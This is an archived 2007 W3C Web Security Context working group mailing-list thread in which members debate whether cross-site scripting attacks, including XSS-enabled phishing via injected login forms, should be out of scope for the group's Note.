W3C home > Mailing lists > Public > public-wsc-wg@w3.org > April 2007

RE: XSS out of scope

From: Dan Schutzer <dan.schutzer@fstc.org>
Date: Fri, 6 Apr 2007 10:39:12 -0400
To: "'Mary Ellen Zurko'" <Mary_Ellen_Zurko@notesdev.ibm.com>, "'Shawn Duffy <sduffy'" <sduffy@aol.net>
Cc: <public-wsc-wg@w3.org>, "'Close, Tyler J.'" <tyler.close@hp.com>
Message-ID: <013401c77859$58b30c20$6500a8c0@dschutzer>
I don't think this should be out of scope, some of our solutions address how
to mitigate this. And some of our suggestions for strengthening the Browser
also help in this area.



From: public-wsc-wg-request@w3.org [mailto:public-wsc-wg-request@w3.org] On
Behalf Of Mary Ellen Zurko
Sent: Friday, April 06, 2007 10:11 AM
To: Shawn Duffy <sduffy
Cc: public-wsc-wg@w3.org; Close, Tyler J.
Subject: Re: XSS out of scope


I think it has to be. But could you offer up a scenario of what we would do
it if wasn't, just so I can be sure? (or maybe someone who's sure will


Mary Ellen Zurko, STSM, IBM Lotus CTO Office       (t/l 333-6389)
Lotus/WPLC Security Strategy and Patent Innovation Architect

Shawn Duffy <sduffy@aol.net>
Sent by: public-wsc-wg-request@w3.org

04/05/2007 10:44 AM


"Close, Tyler J." <tyler.close@hp.com>




Re: XSS out of scope




Does this also include phishing that is only made possible via XSS, such
as a "trusted" site that has been injected with a fake login form via
XSS?  Is that also out of scope?  Just want to make sure I'm clear where
we're drawing the boundary...

Close, Tyler J. wrote:
> I've added a new Out of scope section to our Note to cover XSS attacks.
> See:
> http://www.w3.org/2006/WSC/drafts/note/#XSS
> This edit addresses ACTION-160
> Tyler
Received on Friday, 6 April 2007 14:40:01 UTC

This archive was generated by hypermail 2.3.1 : Tuesday, 6 January 2015 21:14:15 UTC